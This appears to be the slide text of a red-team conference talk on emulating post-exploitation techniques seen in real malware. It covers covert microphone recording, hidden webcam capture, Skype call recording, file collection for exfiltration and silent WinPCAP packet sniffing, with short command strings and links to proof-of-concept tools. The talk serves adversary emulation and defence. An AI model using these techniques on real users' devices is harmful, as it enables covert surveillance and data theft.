Adversarial Post-ExLessons From The Pros

Justin Warner, Chris RossVeris Group’s Adaptive Threat Division

Overview◦Introductions◦Adversary Emulation◦Lessons From “Bad Guys”◦Post-Ex Features

▫Analysis of Bad Guy Use▫Lessons Learned▫Proof Of Concept

◦Defending Against Post-Ex◦Conclusion

$whoami◦Justin Warner

▫Manager - Offensive Services, ATD▫Former USAF Guy▫Interest: red team, reverse engineering,

PowerShell, and studying tradecraft◦Chris Ross

▫ Penetration Tester/Red Teamer - ATD▫ Python EmPyre Developer▫ Interest: Replicate adversarial tradecraft

in PowerShell and Python

Inspiration For This Talk◦Richard Wartell (@Wartotell) - Malware Is Hard, Let’s Go Shopping!

◦Offensive toolsets▫Matt Graeber (@mattifestation) -

PowerSploit Project ▫Josh Pitts (@midnite_runr) - BDF Proxy▫Jamieson O'Reilly - Mimikittenz

◦Lots of red team engagements

First Things FirstLet’s not rush this

Adversaries◦Adversary - One’s opponent in a conflict

◦Threat - The potential for the occurrence of a harmful event

▫The source and means of harm◦This is the entity on the other side of the playing field

▫A wide range of entities and abilities▫A lot can be learned by studying them

APT Like These Guys

… Or More Like These Guys

Adversary Emulation ◦A type of red teaming that focuses on the emulation of a specific adversary

▫Utilize intel to model the adversary▫Highly realistic tools▫Attempt to behave as they have before▫Many strengths

◦Some weaknesses to this approach▫Risk of handcuffing the red team▫Easy to study tools, hard to emulate

tactics/techniques (lack of intel)

Diamond Model

The Diamond Model of Intrusion Analysis - Chris Betz, Sergio Caltagirone, Andrew Pendergast

Axiom 1: “For every intrusion event there exists an adversary taking a step towards an intended goal by using a capability over

infrastructure against a victim to produce a result”.

Post-Exploitation ◦Post-Exploitation - The actions taken by an adversary after exploitation

◦Some example actions: ▫Recon▫Privilege Escalation▫Credential Abuse▫Lateral Spread▫Additional Exploitation▫Sensitive Data Access▫Exfiltration

Malware Repurposing◦ The process of

analyzing malware with the intent of reusing techniques, code, or actual samples

◦ Relax… somebody else has done the work so you don’t have to

School Is In SessionBad Guys

Learning From “Bad Guys”◦Benefits:

▫Highly realistic (based on real events)▫Continuous tool ideas - “Hackers gonna

Hack”▫They have solved the problem for you

◦Downsides:▫Can be a significant effort to emulate▫Not always easy to translate techniques into

usable assessment methods▫Risk of focusing too much on known methods▫Limit creativity

Process For Emulation

See Cool Stuff◦Where can we see cool stuff?

▫APT Reports▫VirusTotal API▫Private malware sources ▫Network defenders (for internal teams)▫VirusShare

◦What are we trying to get our hands on?

▫Raw samples▫IOCs and other obvious defensive sigs▫Technical discussion over TTPs

(intel)

Analyze Cool Stuff◦Malware analysis and RE skills will be useful but are not required

▫Plenty of technical threat reporting to help guide your development

◦Learning RE is fun!“Practical Malware Analysis”“The IDA Pro Book”Endless hours reading assembly and

controlling bad guy tools◦Consider the value of generic TTP discussion rather than tool specifics

We Will Not Do This To You

Research Alternatives◦Are there other APIs or pre-built libraries that will allow you to accomplish this technique?

▫Will be useful to be familiar with WinAPI ▫.NET assemblies will have many things

implemented for you◦Is there a project that already implemented a certain technique?

▫If it is not “representative” enough, might not consider it an alternative

Implement Cool Stuff◦Don’t work too hard…

▫No need to learn C/C++ unless you are truly strict on replicating

▫Live off the land!◦Why are we such PS fanboys?

▫Native to Win7 and above▫Direct API access through reflection▫When used appropriately, memory only

capabilities can be created▫Easy to prototype, dev, test, and deploy

in a rapid manner

Tool Disclaimer◦These tools are POCs written to demonstrate concepts

▫Not all of them will be actively supported

◦Use at your own risk… learn the language and review the code!

▫Even better, start similar projects or contribute back to these

Hot Cam & Hot MicOh the things you will see...

1

Examples In Wild◦ Microphone

▫LuxNetRAT - “Over the Counter” RAThttps://brage.bibsys.no/xmlui/bitstream/handle/11250/198379/KTGardasen.pdf

MCISendString to issue commands to the

backend interface◦Webcam

▫RocketKitten - MPK ShellSimplistic custom backdoorVFW capCreateCaptureWindow API call to

create a hidden capture windowSendMessage to the new capture window

to control the camera actions

How it Works - MCI Hot MicMultimedia Command Interface - Device independent method

of controlling multimedia devices

MCI

“open new Type waveaudio Alias SecretName”

“record SecretName”

“save SecretName”

“close SecretName”

MCISendString

Sleep

How it Works - VFW Snapshot

Alternatives?◦ Video

▫Most of the tools we saw utilized DirectX and DirectShow to accomplish Video Capture

There is a .NET assembly for this!▫What does MS say about VFW:

◦Audio▫We analyzed a bunch of tools that used

native WinMM methods instead of MCI

MCI Hot Mic◦Get-MicrophoneAudio in PowerSploit “dev” branch

▫Utilizes pure reflection in PowerShell to call Win32 API in Winmm.dll

▫Writes “wav” file to disk at specified location

▫No compression

https://github.com/PowerShellMafia/PowerSploit/blob/dev/Exfiltration/Get-MicrophoneAudio.ps1

RocketKitten VFW Mockup◦Get-VFWSnapshot

▫Logically similar mockup of camera functionality in the MPK backdoor

▫Utilizes PSReflect from Matt Graeber to expose Win32 APIs

▫BUT… causes user interaction almost every time (unless camera is activated)

https://github.com/sixdub/BSidesDC2016/blob/master/Get-VFWSnapshot.ps1

...When We Listen To M$◦Get-DXWebcamVideo.ps1

▫Utilizes DirectShow .NET and DirectX Capture Library

All credit to the original authors:DirectX Capture - Brian Low - Public DomainDirectShow .NET - Unknown - LGPL

▫Captures video and audio▫Supports compression and video tuning

https://github.com/xorrior/RandomPS-Scripts/blob/master/Get-DXWebcamVideo.ps1

Toying With SkypeWhen APIs turn against you

2

Examples In Wild◦T9000 Malware - “tyeu.dat”

▫Used in APAC region for targeted attacks◦Malware is used to gather screenshots from active user and Skype for Desktop data

▫Heavy anti-analysis features :( ▫Thread 1 - desktop screenshots▫Thread 2 - targeted window screenshots▫Thread 3 - Skype monitoring via API

Video snapshotsAudio recordingsCall log

How it Works 1/21. RegisterWindowMessage

SkypeControlAPIAttachSkypeControlAPIDiscover

2. SendMessageTimeout

Custom WindowProc Function4. Messages filtered

3. Skype Alert

How It Works 2/2

RINGING

INPROGRESS

FINISHED

CALL 34243

HotSexyBod123

“GET CALL 34243 PARTNER_HANDLE”

“HotSexyBod123”

“ALTER CALL 34243 SET_OUTPUT FILE=out.wav”

“ALTER CALL 34243 SET_CAPTURE_MIC FILE =mic.wav”

Status

Call Logged

Skype Controller ◦Start-SkypeRecorder

▫Heavily adapted from T9000 malware and other third party software.

▫Utilizes pure .NET reflection to create a window and send messages.

▫User interaction will be required upon request to connect to the Skype Desktop API.

https://github.com/sixdub/BSidesDC2016/blob/master/SkypeRecorder.ps1

File System FunGift that keeps on giving

3

Example In Wild◦ FLASHFLOOD Malware

▫ APT30 aka NaikonAPT◦ Profiles host and packages up selected files

▫ Uses timestamps to measure change▫Uses deflate compression with slight mod

◦ Gathers:▫ Windows Address Book (WAB) info▫ All .lnk files from recent docs▫ All files matching predefined patterns from:

Connected drives (USBs)DesktopTemp internet filesTemp

How it Works

Desktop\accounts.doc

Windows\$NtUninstallKB885884$\FlashFiles\accounts.ldf

Newer Than Recorded

Time

Desktop\Passwords.csv

Alternate Techniques?◦ Eventing Options:

▫FindFirstChangeNotification - Win32 API to utilize asynchronous eventing to alert on file changes

▫System.IO.FileSystemWatcher - .NET class that monitors file system changeshttps://gist.github.com/HarmJ0y/4034d935a3386b96f3ac

▫WMI Eventing to detect change

◦ Numerous options available for storage/compression/encryption

▫Will Schroeder’s (@harmj0y) Out-EncryptedStore function

FileSystemWatcher Exfil◦Utilizes Start-FileSystemMonitor

▫Slight tweaks to make it dump output◦Combine with the following

▫Out-EncryptedStore - BETTER OPTIONCustom capabilityUses RSA/AES as desiredhttp://www.harmj0y.net/blog/redteaming/offensive-encrypted-data-storage

▫Write-FlashfloodFile

Replicates algorithm in FLASHFLOOD https://github.com/sixdub/BSidesDC2016/blob/master/Write-FlashfloodFile.ps1

Catching PacketzA deep look inside target networks

4

Examples In Wild◦NaikonAPT / APT30

▫“Lateral movements included copying over and remotely setting up winpcap across desktop systems… then remotely setting up AT jobs to run”

◦ RocketKitten▫MPK Shell

Raw sockets to sniff TCP/UDP◦Duqu 2.0

▫Dropped WinPCAP driver in VFS and loaded to inject MDNS replies

How it Works - WinPCAP

1- Install WinPCAP “Silently” 2- Utilize WinPCAP For Capture● Pcap_open ● Pcap_compile● Pcap_setfilter● Pcap_dumpopen● pcap_dump

sc.exe create npf ...

%WINDIR\system32 \drivers

npf.syspacket.dll

wpcap.dll

pthreadvc.dll

secretdump.pcap

Research◦Numerous other methods can be used to capture/trace packets:

▫Windows Filtering Platform Drivers▫Event Tracing for Windows (ETW)

◦Inveigh uses raw sockets to spoof▫Kevin Robertson (@Kevin_Robertson)

◦Previous work by Alex Rymdeko @killswitch_GUI

◦Several .NET assemblies help us with WinPCAP in PowerShell

WinPCap Mockup◦Get-WinPCapCapture

▫Utilizes Packet.NET and SharpPCap assemblies to accomplish capture

Credit to those authors!▫Comes with Install and Remove function

for “hot” loading of WinPCAP▫Allows you to add filters▫Stops capture when:

Timeout is hitSize limit is reached

https://github.com/sixdub/BSidesDC2016/blob/master/Get-WinPCapCapture.ps1

Defense & ConclusionIS THE WORLD ENDING?!??!

Mitigation◦There is not a single trick to prevent post-exploitation actions

▫“Users gonna use” - @enigma0x3▫PowerShell != Enemy

◦Use industry “best practice”▫Heavy auditing of environments

◦You don’t need next-gen if you don’t defend the current-gen

▫http://www.leeholmes.com/blog/2014/12/08/maslows-hierarchy-of-security-controls/

““Every contact leaves a trace”◦ Locard's Exchange Principle

So go find the trace...

What about threat hunting?

Conclusion◦Realistic threat replication must properly model threats

▫Realistic tactics (study intel)▫Observed techniques▫Similar behavior or procedures

◦There are plenty of creative Post-Ex techniques to use

▫Don’t be so square… :)◦You are defending against a human

▫OPSEC is rarely perfect, hunt for trace evidence

Malware References◦RocketKitten - MPK Shell

◦Sha1: Eb6a21585899e702fc23b290d449af846123845f

◦https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf

Malware References◦T9000 Malware - Tyeu.data

◦Sha1: 21e78381c75184e5531dfc946cbc0c257e33325b

◦http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/

Malware References◦Naikon APT (AKA APT30) FLASHFLOOD Malware

◦Sha1: cfa438449715b61bffa20130df8af778ef011e15

◦Two good references: ▫https://www2.fireeye.com/rs/fireye/images/rp

t-apt30.pdf▫https://securelist.com/analysis/publications/6

9953/the-naikon-apt/

Malware References◦Duqu 2.0 Malware

◦IOCs:▫https://securelist.com/files/2015/06/7c6c

e6b6-fee1-4b7b-b5b5-adaff0d8022f.ioc

◦Original Post: ▫https://securelist.com/files/2015/06/The_

Mystery_of_Duqu_2_0_a_sophisticated_cyberespionage_actor_returns.pdf